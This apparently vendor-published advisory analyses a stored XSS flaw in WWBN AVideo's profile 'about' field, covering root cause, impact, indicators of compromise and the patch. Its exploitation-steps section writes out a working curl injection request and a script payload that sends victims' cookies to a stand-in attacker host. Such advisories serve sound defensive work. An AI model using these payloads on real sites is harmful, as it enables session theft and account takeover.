CVE-2026-33683: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33683 is a stored Cross-Site Scripting (XSS) vulnerability in WWBN AVideo, an open source video platform, affecting all versions up to and including 26.0. The flaw resides in the user profile "about" field, where a sanitization order-of-operations bug allows any registered user to inject arbitrary JavaScript that executes in the browsers of other users visiting their channel page. It was published on March 23, 2026, with a patch committed the same day. The vulnerability carries a CVSS v3.1 base score of 5.4 (Medium) (Github Advisory, GHSA Advisory).

Technical details

The root cause is a sanitization order-of-operations flaw classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). In objects/user.php, the setAbout() method calls strip_specific_tags(xss_esc($about)): the inner xss_esc() function first HTML-encodes the input via htmlspecialchars(), converting <script> to &lt;script&gt;, which causes the subsequent strip_specific_tags() regex patterns to never match the now-encoded tags — rendering the tag stripping completely ineffective. On output in view/channelBody.php, html_entity_decode() reverses the encoding and the raw malicious HTML is echoed directly into the page. A secondary bypass exists because the <img> tag is not in the strip_specific_tags blocklist, allowing <img src=x onerror=...> payloads to bypass even the intended sanitization without relying on the encoding flaw (GHSA Advisory, Github Advisory).

Impact

Successful exploitation enables session hijacking — an attacker can steal session cookies of any user, including administrators, who visits their channel page, potentially leading to full account takeover and administrative access to the AVideo instance. The channel page is publicly accessible without authentication, meaning the injected payload executes for all visitors, not just logged-in users. Additional impacts include phishing via injected fake login forms, redirection to malicious sites, and a self-propagating XSS worm that could programmatically modify other users' profiles (GHSA Advisory).

Exploitability

A proof-of-concept exploit with concrete curl commands and payloads is publicly available in the GitHub Security Advisory, demonstrating both <img onerror> and <script> tag vectors for session cookie theft. Exploitation requires only a low-privileged registered account to inject the payload, while the payload executes against any visitor (including unauthenticated users) to the attacker's channel page. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.029–0.041%, placing it in the 13th percentile for exploitation likelihood (GHSA Advisory, Github Advisory).

Exploitation steps

  1. Reconnaissance: Identify a publicly accessible WWBN AVideo instance running version 26.0 or earlier. The channel pages are publicly viewable without authentication.
  2. Obtain a registered account: Register or use an existing low-privileged account on the target AVideo instance to obtain a valid session cookie (PHPSESSID).
  3. Inject the XSS payload: Send a POST request to objects/userUpdate.json.php with a malicious about field value. Use an <img> tag payload (bypasses the blocklist entirely) or a <script> tag payload (bypasses via the encoding flaw):
curl -X POST 'https://TARGET/objects/userUpdate.json.php' \
  -H 'Cookie: PHPSESSID=ATTACKER_SESSION' \
  -d 'about=<img src=x onerror=alert(document.cookie)>&user=attacker&pass=password123&email=attacker@example.com&name=Attacker&analyticsCode=&donationLink=&phone='
  1. Deliver the malicious channel page: Direct victims (or wait for organic traffic) to the attacker's channel page at https://TARGET/channel/attacker. No authentication is required for victims to trigger the payload.
  2. Harvest session cookies: The injected JavaScript executes in the victim's browser. Using a fetch-based payload, session cookies are exfiltrated to an attacker-controlled server:
-d 'about=<script>fetch("https://attacker.example/steal?c="+document.cookie)</script>...'
  1. Account takeover: Use the stolen session token to authenticate as the victim (or administrator), gaining full access to their account and potentially the entire AVideo instance (GHSA Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unexpected external domains (e.g., attacker.example) with query parameters containing cookie values; unusual POST requests to /objects/userUpdate.json.php with HTML tags (<script>, <img>, <iframe>) in the about parameter.
  • Logs: Web server access logs showing POST requests to /objects/userUpdate.json.php with encoded or raw HTML payloads in the request body; access log entries for /channel/<username> from a wide range of IPs following a profile update.
  • Application: User profile "about" fields in the database containing raw HTML tags such as <script>, <img src=x onerror=, <iframe>, or Base64-encoded JavaScript; unexpected JavaScript content stored in the about column of the users table.
  • Browser/Client: Unexpected JavaScript alerts or network requests to external domains triggered when visiting a channel page; session cookies appearing in external server logs (GHSA Advisory).

Mitigation and workarounds

The official fix is implemented in commit 7cfdc380dae1e56bbb5de581470d9e9957445df0, which replaces the flawed sanitization in view/channelBody.php with HTMLPurifier applied after html_entity_decode(), using a strict allowlist of safe HTML tags and attributes. Administrators should update to a version of AVideo that includes this commit. As a temporary workaround, restrict which users can modify their profile "about" field, or disable the display of user-provided about content on channel pages until patching is complete. Alternatively, removing the html_entity_decode() call from view/channelBody.php or reversing the sanitization order (calling strip_specific_tags before xss_esc) would also mitigate the vulnerability (GHSA Advisory, Patch Commit).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management